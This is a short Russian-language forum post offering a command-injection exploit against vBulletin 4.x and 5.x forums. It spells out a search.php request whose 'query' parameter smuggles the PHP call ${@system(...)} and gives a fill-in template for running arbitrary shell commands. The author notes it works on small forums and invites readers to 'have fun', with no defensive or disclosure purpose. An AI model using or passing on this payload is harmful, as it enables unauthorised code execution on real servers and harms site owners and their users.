На топовых форумах конечно не работает, но на школофорумах вполне.
search.php?ajax=0&beforeafter=after&childforums=1& exactname=1&exclude=&forumchoice=&nocache=0&query= %24%7b%40system('pwd')%7d&quicksearch=0&replyless= 0&replylimit=0&saveprefs=1&searchdate=0&searchth re adid=0&searchtype=1&searchuser=1&showposts=0&sortb y=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0 # "query" param # php code to inject : ${@system('put command here')
Уязвимые версии: vBulletin v4.x.x and 5.х.x
P.S. Только для тех, кто дружит с php. Развлекайтесь)